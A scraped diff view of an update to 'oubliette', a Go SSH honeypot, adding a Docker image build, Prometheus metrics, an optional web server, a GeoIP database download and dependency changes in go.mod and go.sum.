Add the flake as an input and enable the service: Add the flake as an input and enable the service:
@@ -71,3 +95,15 @@ Add the flake as an input and enable the service:
``` ```
Alternatively, use `configFile` to pass a pre-written TOML file instead of `settings`. Alternatively, use `configFile` to pass a pre-written TOML file instead of `settings`.
### Docker
Build a Docker image via nix:
```sh
nix build .#dockerImage
docker load < result
docker run -v /path/to/data:/data -p 2222:2222 -p 8080:8080 oubliette:0.8.0
```
Place your `oubliette.toml` in the data volume. The container exposes ports 2222 (SSH) and 8080 (web/metrics).

View File

@@ -2,27 +2,40 @@ package main
import ( import (
"context" "context"
"errors"
"flag" "flag"
"fmt"
"log/slog" "log/slog"
"net/http"
"os" "os"
"os/signal" "os/signal"
"sync"
"syscall" "syscall"
"time"
"git.t-juice.club/torjus/oubliette/internal/config" "code.t-juice.club/torjus/oubliette/internal/config"
"git.t-juice.club/torjus/oubliette/internal/server" "code.t-juice.club/torjus/oubliette/internal/metrics"
"git.t-juice.club/torjus/oubliette/internal/storage" "code.t-juice.club/torjus/oubliette/internal/server"
"code.t-juice.club/torjus/oubliette/internal/storage"
"code.t-juice.club/torjus/oubliette/internal/web"
) )
const Version = "0.1.0" const Version = "0.18.0"
func main() { func main() {
if err := run(); err != nil {
slog.Error("fatal error", "err", err)
os.Exit(1)
}
}
func run() error {
configPath := flag.String("config", "oubliette.toml", "path to config file") configPath := flag.String("config", "oubliette.toml", "path to config file")
flag.Parse() flag.Parse()
cfg, err := config.Load(*configPath) cfg, err := config.Load(*configPath)
if err != nil { if err != nil {
slog.Error("failed to load config", "err", err) return fmt.Errorf("load config: %w", err)
os.Exit(1)
} }
level := new(slog.LevelVar) level := new(slog.LevelVar)
@@ -49,26 +62,72 @@ func main() {
store, err := storage.NewSQLiteStore(cfg.Storage.DBPath) store, err := storage.NewSQLiteStore(cfg.Storage.DBPath)
if err != nil { if err != nil {
logger.Error("failed to open database", "err", err) return fmt.Errorf("open database: %w", err)
os.Exit(1)
} }
defer store.Close() defer store.Close()
// Clean up sessions left active by a previous unclean shutdown.
if n, err := store.CloseActiveSessions(context.Background(), time.Now()); err != nil {
return fmt.Errorf("close stale sessions: %w", err)
} else if n > 0 {
logger.Info("closed stale sessions from previous run", "count", n)
}
ctx, cancel := signal.NotifyContext(context.Background(), syscall.SIGINT, syscall.SIGTERM) ctx, cancel := signal.NotifyContext(context.Background(), syscall.SIGINT, syscall.SIGTERM)
defer cancel() defer cancel()
go storage.RunRetention(ctx, store, cfg.Storage.RetentionDays, cfg.Storage.RetentionIntervalDuration, logger) m := metrics.New(Version)
instrumentedStore := storage.NewInstrumentedStore(store, m.StorageQueryDuration, m.StorageQueryErrors)
m.RegisterStoreCollector(instrumentedStore)
srv, err := server.New(*cfg, store, logger) go storage.RunRetention(ctx, instrumentedStore, cfg.Storage.RetentionDays, cfg.Storage.RetentionIntervalDuration, logger)
srv, err := server.New(*cfg, instrumentedStore, logger, m)
if err != nil { if err != nil {
logger.Error("failed to create server", "err", err) return fmt.Errorf("create server: %w", err)
os.Exit(1) }
var wg sync.WaitGroup
// Start web server if enabled.
if cfg.Web.Enabled {
var metricsHandler http.Handler
if *cfg.Web.MetricsEnabled {
metricsHandler = m.Handler()
}
webHandler, err := web.NewServer(instrumentedStore, logger.With("component", "web"), metricsHandler, cfg.Web.MetricsToken)
if err != nil {
return fmt.Errorf("create web server: %w", err)
}
httpServer := &http.Server{
Addr: cfg.Web.ListenAddr,
Handler: webHandler,
ReadHeaderTimeout: 10 * time.Second,
}
wg.Go(func() {
logger.Info("web server listening", "addr", cfg.Web.ListenAddr)
if err := httpServer.ListenAndServe(); err != nil && !errors.Is(err, http.ErrServerClosed) {
logger.Error("web server error", "err", err)
}
})
// Graceful shutdown on context cancellation.
go func() {
<-ctx.Done()
if err := httpServer.Shutdown(context.Background()); err != nil {
logger.Error("web server shutdown error", "err", err)
}
}()
} }
if err := srv.ListenAndServe(ctx); err != nil { if err := srv.ListenAndServe(ctx); err != nil {
logger.Error("server error", "err", err) return fmt.Errorf("server: %w", err)
os.Exit(1)
} }
wg.Wait()
logger.Info("server stopped") logger.Info("server stopped")
return nil
} }

View File

@@ -18,19 +18,44 @@
pkgs = nixpkgs.legacyPackages.${system}; pkgs = nixpkgs.legacyPackages.${system};
mainGo = builtins.readFile ./cmd/oubliette/main.go; mainGo = builtins.readFile ./cmd/oubliette/main.go;
version = builtins.head (builtins.match ''.*const Version = "([^"]+)".*'' mainGo); version = builtins.head (builtins.match ''.*const Version = "([^"]+)".*'' mainGo);
geoipDb = pkgs.fetchurl {
url = "https://download.db-ip.com/free/dbip-country-lite-2026-02.mmdb.gz";
hash = "sha256-xmQZEJZ5WzE9uQww1Sdb8248l+liYw46tjbfJeu945Q=";
};
in in
{ {
default = pkgs.buildGoModule { default = pkgs.buildGoModule {
pname = "oubliette"; pname = "oubliette";
inherit version; inherit version;
src = ./.; src = ./.;
vendorHash = "sha256-EbJ90e4Jco7CvYYJLrewFLD5XF+Wv6TsT8RRLcj+ijU="; vendorHash = "sha256-/zxK6CABLYBNtuSOI8dIVgMNxKiDIcbZUS7bQR5TenA=";
subPackages = [ "cmd/oubliette" ]; subPackages = [ "cmd/oubliette" ];
nativeBuildInputs = [ pkgs.gzip ];
preBuild = ''
gunzip -c ${geoipDb} > internal/geoip/dbip-country-lite.mmdb
'';
meta = { meta = {
description = "SSH honeypot"; description = "SSH honeypot";
mainProgram = "oubliette"; mainProgram = "oubliette";
}; };
}; };
dockerImage = pkgs.dockerTools.buildLayeredImage {
name = "oubliette";
tag = version;
contents = [ self.packages.${system}.default ];
config = {
Entrypoint = [ "/bin/oubliette" ];
Cmd = [ "-config" "/data/oubliette.toml" ];
ExposedPorts = {
"2222/tcp" = {};
"8080/tcp" = {};
};
Volumes = {
"/data" = {};
};
};
};
}); });
devShells = forAllSystems (system: devShells = forAllSystems (system:
@@ -43,6 +68,7 @@
pkgs.go pkgs.go
pkgs.govulncheck pkgs.govulncheck
pkgs.golangci-lint pkgs.golangci-lint
pkgs.sqlite
]; ];
}; };
}); });

30
go.mod
View File

@@ -1,21 +1,49 @@
module git.t-juice.club/torjus/oubliette module code.t-juice.club/torjus/oubliette
go 1.25.5 go 1.25.5
require ( require (
github.com/BurntSushi/toml v1.6.0 github.com/BurntSushi/toml v1.6.0
github.com/charmbracelet/bubbletea v1.3.10
github.com/charmbracelet/lipgloss v1.1.0
github.com/google/uuid v1.6.0 github.com/google/uuid v1.6.0
github.com/oschwald/maxminddb-golang v1.13.1
github.com/prometheus/client_golang v1.23.2
github.com/prometheus/client_model v0.6.2
golang.org/x/crypto v0.48.0 golang.org/x/crypto v0.48.0
modernc.org/sqlite v1.45.0 modernc.org/sqlite v1.45.0
) )
require ( require (
github.com/aymanbagabas/go-osc52/v2 v2.0.1 // indirect
github.com/beorn7/perks v1.0.1 // indirect
github.com/cespare/xxhash/v2 v2.3.0 // indirect
github.com/charmbracelet/colorprofile v0.2.3-0.20250311203215-f60798e515dc // indirect
github.com/charmbracelet/x/ansi v0.10.1 // indirect
github.com/charmbracelet/x/cellbuf v0.0.13-0.20250311204145-2c3ea96c31dd // indirect
github.com/charmbracelet/x/term v0.2.1 // indirect
github.com/dustin/go-humanize v1.0.1 // indirect github.com/dustin/go-humanize v1.0.1 // indirect
github.com/erikgeiser/coninput v0.0.0-20211004153227-1c3628e74d0f // indirect
github.com/kr/text v0.2.0 // indirect
github.com/lucasb-eyer/go-colorful v1.2.0 // indirect
github.com/mattn/go-isatty v0.0.20 // indirect github.com/mattn/go-isatty v0.0.20 // indirect
github.com/mattn/go-localereader v0.0.1 // indirect
github.com/mattn/go-runewidth v0.0.16 // indirect
github.com/muesli/ansi v0.0.0-20230316100256-276c6243b2f6 // indirect
github.com/muesli/cancelreader v0.2.2 // indirect
github.com/muesli/termenv v0.16.0 // indirect
github.com/munnerz/goautoneg v0.0.0-20191010083416-a7dc8b61c822 // indirect
github.com/ncruces/go-strftime v1.0.0 // indirect github.com/ncruces/go-strftime v1.0.0 // indirect
github.com/prometheus/common v0.66.1 // indirect
github.com/prometheus/procfs v0.16.1 // indirect
github.com/remyoudompheng/bigfft v0.0.0-20230129092748-24d4a6f8daec // indirect github.com/remyoudompheng/bigfft v0.0.0-20230129092748-24d4a6f8daec // indirect
github.com/rivo/uniseg v0.4.7 // indirect
github.com/xo/terminfo v0.0.0-20220910002029-abceb7e1c41e // indirect
go.yaml.in/yaml/v2 v2.4.2 // indirect
golang.org/x/exp v0.0.0-20251023183803-a4bb9ffd2546 // indirect golang.org/x/exp v0.0.0-20251023183803-a4bb9ffd2546 // indirect
golang.org/x/sys v0.41.0 // indirect golang.org/x/sys v0.41.0 // indirect
golang.org/x/text v0.34.0 // indirect
google.golang.org/protobuf v1.36.8 // indirect
modernc.org/libc v1.67.6 // indirect modernc.org/libc v1.67.6 // indirect
modernc.org/mathutil v1.7.1 // indirect modernc.org/mathutil v1.7.1 // indirect
modernc.org/memory v1.11.0 // indirect modernc.org/memory v1.11.0 // indirect

94
go.sum
View File

@@ -1,34 +1,116 @@
github.com/BurntSushi/toml v1.6.0 h1:dRaEfpa2VI55EwlIW72hMRHdWouJeRF7TPYhI+AUQjk= github.com/BurntSushi/toml v1.6.0 h1:dRaEfpa2VI55EwlIW72hMRHdWouJeRF7TPYhI+AUQjk=
github.com/BurntSushi/toml v1.6.0/go.mod h1:ukJfTF/6rtPPRCnwkur4qwRxa8vTRFBF0uk2lLoLwho= github.com/BurntSushi/toml v1.6.0/go.mod h1:ukJfTF/6rtPPRCnwkur4qwRxa8vTRFBF0uk2lLoLwho=
github.com/aymanbagabas/go-osc52/v2 v2.0.1 h1:HwpRHbFMcZLEVr42D4p7XBqjyuxQH5SMiErDT4WkJ2k=
github.com/aymanbagabas/go-osc52/v2 v2.0.1/go.mod h1:uYgXzlJ7ZpABp8OJ+exZzJJhRNQ2ASbcXHWsFqH8hp8=
github.com/beorn7/perks v1.0.1 h1:VlbKKnNfV8bJzeqoa4cOKqO6bYr3WgKZxO8Z16+hsOM=
github.com/beorn7/perks v1.0.1/go.mod h1:G2ZrVWU2WbWT9wwq4/hrbKbnv/1ERSJQ0ibhJ6rlkpw=
github.com/cespare/xxhash/v2 v2.3.0 h1:UL815xU9SqsFlibzuggzjXhog7bL6oX9BbNZnL2UFvs=
github.com/cespare/xxhash/v2 v2.3.0/go.mod h1:VGX0DQ3Q6kWi7AoAeZDth3/j3BFtOZR5XLFGgcrjCOs=
github.com/charmbracelet/bubbletea v1.3.10 h1:otUDHWMMzQSB0Pkc87rm691KZ3SWa4KUlvF9nRvCICw=
github.com/charmbracelet/bubbletea v1.3.10/go.mod h1:ORQfo0fk8U+po9VaNvnV95UPWA1BitP1E0N6xJPlHr4=
github.com/charmbracelet/colorprofile v0.2.3-0.20250311203215-f60798e515dc h1:4pZI35227imm7yK2bGPcfpFEmuY1gc2YSTShr4iJBfs=
github.com/charmbracelet/colorprofile v0.2.3-0.20250311203215-f60798e515dc/go.mod h1:X4/0JoqgTIPSFcRA/P6INZzIuyqdFY5rm8tb41s9okk=
github.com/charmbracelet/lipgloss v1.1.0 h1:vYXsiLHVkK7fp74RkV7b2kq9+zDLoEU4MZoFqR/noCY=
github.com/charmbracelet/lipgloss v1.1.0/go.mod h1:/6Q8FR2o+kj8rz4Dq0zQc3vYf7X+B0binUUBwA0aL30=
github.com/charmbracelet/x/ansi v0.10.1 h1:rL3Koar5XvX0pHGfovN03f5cxLbCF2YvLeyz7D2jVDQ=
github.com/charmbracelet/x/ansi v0.10.1/go.mod h1:3RQDQ6lDnROptfpWuUVIUG64bD2g2BgntdxH0Ya5TeE=
github.com/charmbracelet/x/cellbuf v0.0.13-0.20250311204145-2c3ea96c31dd h1:vy0GVL4jeHEwG5YOXDmi86oYw2yuYUGqz6a8sLwg0X8=
github.com/charmbracelet/x/cellbuf v0.0.13-0.20250311204145-2c3ea96c31dd/go.mod h1:xe0nKWGd3eJgtqZRaN9RjMtK7xUYchjzPr7q6kcvCCs=
github.com/charmbracelet/x/term v0.2.1 h1:AQeHeLZ1OqSXhrAWpYUtZyX1T3zVxfpZuEQMIQaGIAQ=
github.com/charmbracelet/x/term v0.2.1/go.mod h1:oQ4enTYFV7QN4m0i9mzHrViD7TQKvNEEkHUMCmsxdUg=
github.com/creack/pty v1.1.9/go.mod h1:oKZEueFk5CKHvIhNR5MUki03XCEU+Q6VDXinZuGJ33E=
github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c=
github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
github.com/dustin/go-humanize v1.0.1 h1:GzkhY7T5VNhEkwH0PVJgjz+fX1rhBrR7pRT3mDkpeCY= github.com/dustin/go-humanize v1.0.1 h1:GzkhY7T5VNhEkwH0PVJgjz+fX1rhBrR7pRT3mDkpeCY=
github.com/dustin/go-humanize v1.0.1/go.mod h1:Mu1zIs6XwVuF/gI1OepvI0qD18qycQx+mFykh5fBlto= github.com/dustin/go-humanize v1.0.1/go.mod h1:Mu1zIs6XwVuF/gI1OepvI0qD18qycQx+mFykh5fBlto=
github.com/erikgeiser/coninput v0.0.0-20211004153227-1c3628e74d0f h1:Y/CXytFA4m6baUTXGLOoWe4PQhGxaX0KpnayAqC48p4=
github.com/erikgeiser/coninput v0.0.0-20211004153227-1c3628e74d0f/go.mod h1:vw97MGsxSvLiUE2X8qFplwetxpGLQrlU1Q9AUEIzCaM=
github.com/google/go-cmp v0.7.0 h1:wk8382ETsv4JYUZwIsn6YpYiWiBsYLSJiTsyBybVuN8=
github.com/google/go-cmp v0.7.0/go.mod h1:pXiqmnSA92OHEEa9HXL2W4E7lf9JzCmGVUdgjX3N/iU=
github.com/google/pprof v0.0.0-20250317173921-a4b03ec1a45e h1:ijClszYn+mADRFY17kjQEVQ1XRhq2/JR1M3sGqeJoxs= github.com/google/pprof v0.0.0-20250317173921-a4b03ec1a45e h1:ijClszYn+mADRFY17kjQEVQ1XRhq2/JR1M3sGqeJoxs=
github.com/google/pprof v0.0.0-20250317173921-a4b03ec1a45e/go.mod h1:boTsfXsheKC2y+lKOCMpSfarhxDeIzfZG1jqGcPl3cA= github.com/google/pprof v0.0.0-20250317173921-a4b03ec1a45e/go.mod h1:boTsfXsheKC2y+lKOCMpSfarhxDeIzfZG1jqGcPl3cA=
github.com/google/uuid v1.6.0 h1:NIvaJDMOsjHA8n1jAhLSgzrAzy1Hgr+hNrb57e+94F0= github.com/google/uuid v1.6.0 h1:NIvaJDMOsjHA8n1jAhLSgzrAzy1Hgr+hNrb57e+94F0=
github.com/google/uuid v1.6.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/google/uuid v1.6.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo=
github.com/hashicorp/golang-lru/v2 v2.0.7 h1:a+bsQ5rvGLjzHuww6tVxozPZFVghXaHOwFs4luLUK2k= github.com/hashicorp/golang-lru/v2 v2.0.7 h1:a+bsQ5rvGLjzHuww6tVxozPZFVghXaHOwFs4luLUK2k=
github.com/hashicorp/golang-lru/v2 v2.0.7/go.mod h1:QeFd9opnmA6QUJc5vARoKUSoFhyfM2/ZepoAG6RGpeM= github.com/hashicorp/golang-lru/v2 v2.0.7/go.mod h1:QeFd9opnmA6QUJc5vARoKUSoFhyfM2/ZepoAG6RGpeM=
github.com/klauspost/compress v1.18.0 h1:c/Cqfb0r+Yi+JtIEq73FWXVkRonBlf0CRNYc8Zttxdo=
github.com/klauspost/compress v1.18.0/go.mod h1:2Pp+KzxcywXVXMr50+X0Q/Lsb43OQHYWRCY2AiWywWQ=
github.com/kr/pretty v0.3.1 h1:flRD4NNwYAUpkphVc1HcthR4KEIFJ65n8Mw5qdRn3LE=
github.com/kr/pretty v0.3.1/go.mod h1:hoEshYVHaxMs3cyo3Yncou5ZscifuDolrwPKZanG3xk=
github.com/kr/text v0.2.0 h1:5Nx0Ya0ZqY2ygV366QzturHI13Jq95ApcVaJBhpS+AY=
github.com/kr/text v0.2.0/go.mod h1:eLer722TekiGuMkidMxC/pM04lWEeraHUUmBw8l2grE=
github.com/kylelemons/godebug v1.1.0 h1:RPNrshWIDI6G2gRW9EHilWtl7Z6Sb1BR0xunSBf0SNc=
github.com/kylelemons/godebug v1.1.0/go.mod h1:9/0rRGxNHcop5bhtWyNeEfOS8JIWk580+fNqagV/RAw=
github.com/lucasb-eyer/go-colorful v1.2.0 h1:1nnpGOrhyZZuNyfu1QjKiUICQ74+3FNCN69Aj6K7nkY=
github.com/lucasb-eyer/go-colorful v1.2.0/go.mod h1:R4dSotOR9KMtayYi1e77YzuveK+i7ruzyGqttikkLy0=
github.com/mattn/go-isatty v0.0.20 h1:xfD0iDuEKnDkl03q4limB+vH+GxLEtL/jb4xVJSWWEY= github.com/mattn/go-isatty v0.0.20 h1:xfD0iDuEKnDkl03q4limB+vH+GxLEtL/jb4xVJSWWEY=
github.com/mattn/go-isatty v0.0.20/go.mod h1:W+V8PltTTMOvKvAeJH7IuucS94S2C6jfK/D7dTCTo3Y= github.com/mattn/go-isatty v0.0.20/go.mod h1:W+V8PltTTMOvKvAeJH7IuucS94S2C6jfK/D7dTCTo3Y=
github.com/mattn/go-localereader v0.0.1 h1:ygSAOl7ZXTx4RdPYinUpg6W99U8jWvWi9Ye2JC/oIi4=
github.com/mattn/go-localereader v0.0.1/go.mod h1:8fBrzywKY7BI3czFoHkuzRoWE9C+EiG4R1k4Cjx5p88=
github.com/mattn/go-runewidth v0.0.16 h1:E5ScNMtiwvlvB5paMFdw9p4kSQzbXFikJ5SQO6TULQc=
github.com/mattn/go-runewidth v0.0.16/go.mod h1:Jdepj2loyihRzMpdS35Xk/zdY8IAYHsh153qUoGf23w=
github.com/muesli/ansi v0.0.0-20230316100256-276c6243b2f6 h1:ZK8zHtRHOkbHy6Mmr5D264iyp3TiX5OmNcI5cIARiQI=
github.com/muesli/ansi v0.0.0-20230316100256-276c6243b2f6/go.mod h1:CJlz5H+gyd6CUWT45Oy4q24RdLyn7Md9Vj2/ldJBSIo=
github.com/muesli/cancelreader v0.2.2 h1:3I4Kt4BQjOR54NavqnDogx/MIoWBFa0StPA8ELUXHmA=
github.com/muesli/cancelreader v0.2.2/go.mod h1:3XuTXfFS2VjM+HTLZY9Ak0l6eUKfijIfMUZ4EgX0QYo=
github.com/muesli/termenv v0.16.0 h1:S5AlUN9dENB57rsbnkPyfdGuWIlkmzJjbFf0Tf5FWUc=
github.com/muesli/termenv v0.16.0/go.mod h1:ZRfOIKPFDYQoDFF4Olj7/QJbW60Ol/kL1pU3VfY/Cnk=
github.com/munnerz/goautoneg v0.0.0-20191010083416-a7dc8b61c822 h1:C3w9PqII01/Oq1c1nUAm88MOHcQC9l5mIlSMApZMrHA=
github.com/munnerz/goautoneg v0.0.0-20191010083416-a7dc8b61c822/go.mod h1:+n7T8mK8HuQTcFwEeznm/DIxMOiR9yIdICNftLE1DvQ=
github.com/ncruces/go-strftime v1.0.0 h1:HMFp8mLCTPp341M/ZnA4qaf7ZlsbTc+miZjCLOFAw7w= github.com/ncruces/go-strftime v1.0.0 h1:HMFp8mLCTPp341M/ZnA4qaf7ZlsbTc+miZjCLOFAw7w=
github.com/ncruces/go-strftime v1.0.0/go.mod h1:Fwc5htZGVVkseilnfgOVb9mKy6w1naJmn9CehxcKcls= github.com/ncruces/go-strftime v1.0.0/go.mod h1:Fwc5htZGVVkseilnfgOVb9mKy6w1naJmn9CehxcKcls=
github.com/oschwald/maxminddb-golang v1.13.1 h1:G3wwjdN9JmIK2o/ermkHM+98oX5fS+k5MbwsmL4MRQE=
github.com/oschwald/maxminddb-golang v1.13.1/go.mod h1:K4pgV9N/GcK694KSTmVSDTODk4IsCNThNdTmnaBZ/F8=
github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM=
github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4=
github.com/prometheus/client_golang v1.23.2 h1:Je96obch5RDVy3FDMndoUsjAhG5Edi49h0RJWRi/o0o=
github.com/prometheus/client_golang v1.23.2/go.mod h1:Tb1a6LWHB3/SPIzCoaDXI4I8UHKeFTEQ1YCr+0Gyqmg=
github.com/prometheus/client_model v0.6.2 h1:oBsgwpGs7iVziMvrGhE53c/GrLUsZdHnqNwqPLxwZyk=
github.com/prometheus/client_model v0.6.2/go.mod h1:y3m2F6Gdpfy6Ut/GBsUqTWZqCUvMVzSfMLjcu6wAwpE=
github.com/prometheus/common v0.66.1 h1:h5E0h5/Y8niHc5DlaLlWLArTQI7tMrsfQjHV+d9ZoGs=
github.com/prometheus/common v0.66.1/go.mod h1:gcaUsgf3KfRSwHY4dIMXLPV0K/Wg1oZ8+SbZk/HH/dA=
github.com/prometheus/procfs v0.16.1 h1:hZ15bTNuirocR6u0JZ6BAHHmwS1p8B4P6MRqxtzMyRg=
github.com/prometheus/procfs v0.16.1/go.mod h1:teAbpZRB1iIAJYREa1LsoWUXykVXA1KlTmWl8x/U+Is=
github.com/remyoudompheng/bigfft v0.0.0-20230129092748-24d4a6f8daec h1:W09IVJc94icq4NjY3clb7Lk8O1qJ8BdBEF8z0ibU0rE= github.com/remyoudompheng/bigfft v0.0.0-20230129092748-24d4a6f8daec h1:W09IVJc94icq4NjY3clb7Lk8O1qJ8BdBEF8z0ibU0rE=
github.com/remyoudompheng/bigfft v0.0.0-20230129092748-24d4a6f8daec/go.mod h1:qqbHyh8v60DhA7CoWK5oRCqLrMHRGoxYCSS9EjAz6Eo= github.com/remyoudompheng/bigfft v0.0.0-20230129092748-24d4a6f8daec/go.mod h1:qqbHyh8v60DhA7CoWK5oRCqLrMHRGoxYCSS9EjAz6Eo=
github.com/rivo/uniseg v0.2.0/go.mod h1:J6wj4VEh+S6ZtnVlnTBMWIodfgj8LQOQFoIToxlJtxc=
github.com/rivo/uniseg v0.4.7 h1:WUdvkW8uEhrYfLC4ZzdpI2ztxP1I582+49Oc5Mq64VQ=
github.com/rivo/uniseg v0.4.7/go.mod h1:FN3SvrM+Zdj16jyLfmOkMNblXMcoc8DfTHruCPUcx88=
github.com/rogpeppe/go-internal v1.10.0 h1:TMyTOH3F/DB16zRVcYyreMH6GnZZrwQVAoYjRBZyWFQ=
github.com/rogpeppe/go-internal v1.10.0/go.mod h1:UQnix2H7Ngw/k4C5ijL5+65zddjncjaFoBhdsK/akog=
github.com/stretchr/testify v1.11.1 h1:7s2iGBzp5EwR7/aIZr8ao5+dra3wiQyKjjFuvgVKu7U=
github.com/stretchr/testify v1.11.1/go.mod h1:wZwfW3scLgRK+23gO65QZefKpKQRnfz6sD981Nm4B6U=
github.com/xo/terminfo v0.0.0-20220910002029-abceb7e1c41e h1:JVG44RsyaB9T2KIHavMF/ppJZNG9ZpyihvCd0w101no=
github.com/xo/terminfo v0.0.0-20220910002029-abceb7e1c41e/go.mod h1:RbqR21r5mrJuqunuUZ/Dhy/avygyECGrLceyNeo4LiM=
go.uber.org/goleak v1.3.0 h1:2K3zAYmnTNqV73imy9J1T3WC+gmCePx2hEGkimedGto=
go.uber.org/goleak v1.3.0/go.mod h1:CoHD4mav9JJNrW/WLlf7HGZPjdw8EucARQHekz1X6bE=
go.yaml.in/yaml/v2 v2.4.2 h1:DzmwEr2rDGHl7lsFgAHxmNz/1NlQ7xLIrlN2h5d1eGI=
go.yaml.in/yaml/v2 v2.4.2/go.mod h1:081UH+NErpNdqlCXm3TtEran0rJZGxAYx9hb/ELlsPU=
golang.org/x/crypto v0.48.0 h1:/VRzVqiRSggnhY7gNRxPauEQ5Drw9haKdM0jqfcCFts= golang.org/x/crypto v0.48.0 h1:/VRzVqiRSggnhY7gNRxPauEQ5Drw9haKdM0jqfcCFts=
golang.org/x/crypto v0.48.0/go.mod h1:r0kV5h3qnFPlQnBSrULhlsRfryS2pmewsg+XfMgkVos= golang.org/x/crypto v0.48.0/go.mod h1:r0kV5h3qnFPlQnBSrULhlsRfryS2pmewsg+XfMgkVos=
golang.org/x/exp v0.0.0-20251023183803-a4bb9ffd2546 h1:mgKeJMpvi0yx/sU5GsxQ7p6s2wtOnGAHZWCHUM4KGzY= golang.org/x/exp v0.0.0-20251023183803-a4bb9ffd2546 h1:mgKeJMpvi0yx/sU5GsxQ7p6s2wtOnGAHZWCHUM4KGzY=
golang.org/x/exp v0.0.0-20251023183803-a4bb9ffd2546/go.mod h1:j/pmGrbnkbPtQfxEe5D0VQhZC6qKbfKifgD0oM7sR70= golang.org/x/exp v0.0.0-20251023183803-a4bb9ffd2546/go.mod h1:j/pmGrbnkbPtQfxEe5D0VQhZC6qKbfKifgD0oM7sR70=
golang.org/x/mod v0.29.0 h1:HV8lRxZC4l2cr3Zq1LvtOsi/ThTgWnUk/y64QSs8GwA= golang.org/x/mod v0.32.0 h1:9F4d3PHLljb6x//jOyokMv3eX+YDeepZSEo3mFJy93c=
golang.org/x/mod v0.29.0/go.mod h1:NyhrlYXJ2H4eJiRy/WDBO6HMqZQ6q9nk4JzS3NuCK+w= golang.org/x/mod v0.32.0/go.mod h1:SgipZ/3h2Ci89DlEtEXWUk/HteuRin+HHhN+WbNhguU=
golang.org/x/sync v0.17.0 h1:l60nONMj9l5drqw6jlhIELNv9I0A4OFgRsG9k2oT9Ug= golang.org/x/sync v0.19.0 h1:vV+1eWNmZ5geRlYjzm2adRgW2/mcpevXNg50YZtPCE4=
golang.org/x/sync v0.17.0/go.mod h1:9KTHXmSnoGruLpwFjVSX0lNNA75CykiMECbovNTZqGI= golang.org/x/sync v0.19.0/go.mod h1:9KTHXmSnoGruLpwFjVSX0lNNA75CykiMECbovNTZqGI=
golang.org/x/sys v0.0.0-20210809222454-d867a43fc93e/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
golang.org/x/sys v0.6.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.6.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
golang.org/x/sys v0.41.0 h1:Ivj+2Cp/ylzLiEU89QhWblYnOE9zerudt9Ftecq2C6k= golang.org/x/sys v0.41.0 h1:Ivj+2Cp/ylzLiEU89QhWblYnOE9zerudt9Ftecq2C6k=
golang.org/x/sys v0.41.0/go.mod h1:OgkHotnGiDImocRcuBABYBEXf8A9a87e/uXjp9XT3ks= golang.org/x/sys v0.41.0/go.mod h1:OgkHotnGiDImocRcuBABYBEXf8A9a87e/uXjp9XT3ks=
golang.org/x/term v0.40.0 h1:36e4zGLqU4yhjlmxEaagx2KuYbJq3EwY8K943ZsHcvg= golang.org/x/term v0.40.0 h1:36e4zGLqU4yhjlmxEaagx2KuYbJq3EwY8K943ZsHcvg=
golang.org/x/term v0.40.0/go.mod h1:w2P8uVp06p2iyKKuvXIm7N/y0UCRt3UfJTfZ7oOpglM= golang.org/x/term v0.40.0/go.mod h1:w2P8uVp06p2iyKKuvXIm7N/y0UCRt3UfJTfZ7oOpglM=
golang.org/x/tools v0.38.0 h1:Hx2Xv8hISq8Lm16jvBZ2VQf+RLmbd7wVUsALibYI/IQ= golang.org/x/text v0.34.0 h1:oL/Qq0Kdaqxa1KbNeMKwQq0reLCCaFtqu2eNuSeNHbk=
golang.org/x/tools v0.38.0/go.mod h1:yEsQ/d/YK8cjh0L6rZlY8tgtlKiBNTL14pGDJPJpYQs= golang.org/x/text v0.34.0/go.mod h1:homfLqTYRFyVYemLBFl5GgL/DWEiH5wcsQ5gSh1yziA=
golang.org/x/tools v0.41.0 h1:a9b8iMweWG+S0OBnlU36rzLp20z1Rp10w+IY2czHTQc=
golang.org/x/tools v0.41.0/go.mod h1:XSY6eDqxVNiYgezAVqqCeihT4j1U2CCsqvH3WhQpnlg=
google.golang.org/protobuf v1.36.8 h1:xHScyCOEuuwZEc6UtSOvPbAT4zRh0xcNRYekJwfqyMc=
google.golang.org/protobuf v1.36.8/go.mod h1:fuxRtAxBytpl4zzqUh6/eyUujkJdNiuEkXntxiD/uRU=
gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c h1:Hei/4ADfdWqJk1ZMxUNpqntNwaWcugrBjAiHlqqRiVk=
gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c/go.mod h1:JHkPIbrfpd72SG/EVd6muEfDQjcINNoR0C8j2r3qZ4Q=
gopkg.in/yaml.v3 v3.0.1 h1:fxVm/GzAzEWqLHuvctI91KS9hhNmmWOoWu0XTYJS7CA=
gopkg.in/yaml.v3 v3.0.1/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
modernc.org/cc/v4 v4.27.1 h1:9W30zRlYrefrDV2JE2O8VDtJ1yPGownxciz5rrbQZis= modernc.org/cc/v4 v4.27.1 h1:9W30zRlYrefrDV2JE2O8VDtJ1yPGownxciz5rrbQZis=
modernc.org/cc/v4 v4.27.1/go.mod h1:uVtb5OGqUKpoLWhqwNQo/8LwvoiEBLvZXIQ/SmO6mL0= modernc.org/cc/v4 v4.27.1/go.mod h1:uVtb5OGqUKpoLWhqwNQo/8LwvoiEBLvZXIQ/SmO6mL0=
